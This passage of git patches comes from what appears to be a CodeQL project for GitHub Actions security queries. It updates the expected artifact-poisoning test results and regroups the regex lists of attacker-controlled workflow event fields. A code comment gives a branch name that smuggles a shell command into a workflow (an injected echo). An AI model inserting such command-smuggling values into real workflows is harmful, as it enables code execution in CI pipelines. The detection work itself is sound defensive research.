ba635b1d74d..5bea5c7e52c 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected @@ -1,56 +1,56 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | semmle.label | npm install\nnpm run lint\n | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select -| .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | Run Step | -| .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | Run Step | -| .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | Run Step | -| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | Run Step | -| .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Run Step | -| .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Run Step | -| .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Run Step | -| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Run Step | -| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Run Step | -| .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Run Step | -| .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Run Step | -| .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | Run Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | ./foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | From 00f6ff8c0155c064c5e1733aaf3cc4710755185d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 27 Apr 2024 11:02:33 +0200 Subject: [PATCH 0225/1267] Split sources by taint type --- .../codeql/actions/dataflow/FlowSources.qll | 250 +++++--- .../actions/security/EnvVarInjectionQuery.qll | 8 - ...ahmadnassri_action-changed-files.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 4 +- ...ecloudplatform_dataflowtemplates.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../ext/jitterbit_get-changed-files.model.yml | 14 +- ...han_pull-request-comment-trigger.model.yml | 4 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 6 +- ql/lib/ext/tj-actions_changed-files.model.yml | 34 +- .../tj-actions_verify-changed-files.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 8 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 4 +- ql/src/Security/CWE-077/EnvPathInjection.ql | 6 + ql/src/Security/CWE-077/EnvVarInjection.ql | 9 +- .../CWE-077/PrivilegedEnvPathInjection.ql | 6 + .../CWE-077/PrivilegedEnvVarInjection.ql | 9 +- ql/test/library-tests/test.actual | 598 ------------------ ql/test/library-tests/test.expected | 136 ++-- .../CWE-077/.github/workflows/test1.yml | 2 + .../CWE-077/.github/workflows/test4.yml | 4 + .../Security/CWE-077/EnvVarInjection.expected | 3 + .../PrivilegedEnvPathInjection.expected | 1 - .../PrivilegedEnvVarInjection.expected | 3 + 31 files changed, 336 insertions(+), 797 deletions(-) delete mode 100644 ql/test/library-tests/test.actual diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 0dc376765a8..754d28cb93e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,5 +1,3 @@ -private import actions -private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery @@ -22,53 +20,17 @@ abstract class RemoteFlowSource extends SourceNode { } bindingset[context] -private predicate isExternalUserControlled(string context) { - exists(string reg | reg = "github\\.event" | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) - ) -} - -bindingset[context] -private predicate isExternalUserControlledIssue(string context) { - exists(string reg | reg = ["github\\.event\\.issue\\.title", "github\\.event\\.issue\\.body"] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) - ) -} - -bindingset[context] -private predicate isExternalUserControlledPullRequest(string context) { - exists(string reg | - reg = - [ - "github\\.event\\.pull_request\\.title", "github\\.event\\.pull_request\\.body", - "github\\.event\\.pull_request\\.head\\.label", - "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.repo\\.description", - "github\\.event\\.pull_request\\.head\\.repo\\.homepage", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref" - ] - | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) - ) -} - -bindingset[context] -private predicate isExternalUserControlledReview(string context) { - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.review\\.body")) -} - -bindingset[context] -private predicate isExternalUserControlledComment(string context) { - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.comment\\.body")) -} - -bindingset[context] -private predicate isExternalUserControlledGollum(string context) { +private predicate titleEvent(string context) { exists(string reg | reg = [ + // title + "github\\.event\\.issue\\.title", // issue + "github\\.event\\.pull_request\\.title", // pull request + "github\\.event\\.discussion\\.title", // discussion "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", - "github\\.event\\.pages\\[[0-9]+\\]\\.title" + "github\\.event\\.pages\\[[0-9]+\\]\\.title", + "github\\.event\\.workflow_run\\.display_title", // The event-specific title associated with the run or the run-name if set, or the value of run-name if it is set in the workflow. ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -76,19 +38,12 @@ private predicate isExternalUserControlledGollum(string context) { } bindingset[context] -private predicate isExternalUserControlledCommit(string context) { +private predicate urlEvent(string context) { exists(string reg | reg = [ - "github\\.event\\.commits\\[[0-9]+\\]\\.message", "github\\.event\\.head_commit\\.message", - "github\\.event\\.head_commit\\.author\\.email", - "github\\.event\\.head_commit\\.author\\.name", - "github\\.event\\.head_commit\\.committer\\.email", - "github\\.event\\.head_commit\\.committer\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + // url + "github\\.event\\.pull_request\\.head\\.repo\\.homepage", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -96,32 +51,71 @@ private predicate isExternalUserControlledCommit(string context) { } bindingset[context] -private predicate isExternalUserControlledDiscussion(string context) { +private predicate textEvent(string context) { exists(string reg | - reg = ["github\\.event\\.discussion\\.title", "github\\.event\\.discussion\\.body"] + reg = + [ + // text + "github\\.event\\.issue\\.body", // body + "github\\.event\\.pull_request\\.body", // body + "github\\.event\\.discussion\\.body", // body + "github\\.event\\.review\\.body", // body + "github\\.event\\.comment\\.body", // body + "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage + "github\\.event\\.head_commit\\.message", // message + "github\\.event\\.workflow_run\\.head_commit\\.message", // message + "github\\.event\\.pull_request\\.head\\.repo\\.description", // description + "github\\.event\\.workflow_run\\.head_repository\\.description", // description + "github\\.event\\.client_payload\\[[0-9]+\\]", // payload + "github\\.event\\.client_payload", // payload + "github\\.event\\.inputs\\[[0-9]+\\]", // input + "github\\.event\\.inputs", // input + ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } bindingset[context] -private predicate isExternalUserControlledWorkflowRun(string context) { +private predicate repoNameEvent(string context) { exists(string reg | reg = [ - "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.display_title", + // repo name + // Owner: All characters must be either a hyphen (-) or alphanumeric + // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name + "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name + "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo + ] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + +bindingset[context] +private predicate branchEvent(string context) { + exists(string reg | + reg = + [ + // branch + // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names + // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. + // - They must contain at least one / + // - They cannot have two consecutive dots .. anywhere. + // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. + // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. + // - They cannot begin or end with a slash / or contain multiple consecutive slashes + // - They cannot end with a dot . + // - They cannot contain a sequence @{ + // - They cannot be the single character @ + // - They cannot contain a \ + // eg: zzz";echo${IFS}"hello";# would be a valid branch name + "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref", + "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_repository\\.description", - "github\\.event\\.workflow_run\\.head_repository\\.full_name", - "github\\.event\\.workflow_run\\.head_repository\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.message", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -129,45 +123,117 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } bindingset[context] -private predicate isExternalUserControlledRepositoryDispatch(string context) { +private predicate labelEvent(string context) { exists(string reg | - reg = ["github\\.event\\.client_payload\\[[0-9]+\\]", "github\\.event\\.client_payload",] + reg = + [ + // label + // - They cannot contain a escaping \ + "github\\.event\\.pull_request\\.head\\.label", + ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } bindingset[context] -private predicate isExternalUserControlledWorkflowDispatch(string context) { - exists(string reg | reg = ["github\\.event\\.inputs\\[[0-9]+\\]", "github\\.event\\.inputs",] | +private predicate emailEvent(string context) { + exists(string reg | + reg = + [ + // email + // 